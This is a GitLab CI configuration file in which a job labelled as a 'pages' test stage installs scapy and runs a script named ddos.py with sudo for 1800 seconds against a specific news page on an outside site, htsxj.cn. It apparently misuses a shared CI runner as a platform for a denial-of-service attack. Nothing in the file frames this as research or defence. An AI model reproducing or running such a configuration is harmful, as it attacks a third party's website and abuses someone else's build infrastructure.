image: ubuntu:latest

pages:
  stage: test
  script:
  #-  sed -i s#output_limit = 4096#output_limit = 8192#g /etc/gitlab-runner/config.toml
  - apt update
  - apt install python sudo python-pip -y
  - sudo pip install scapy
  - sudo python2 ddos.py -c 10 -t 1800 http://htsxj.cn/News/NewsDetails?newsId=fa623d93-93a2-4d9d-9c78-a9447298102e&title=%E6%96%B0%E9%97%BB
  artifacts:
    paths:
    - .
  only:
  - master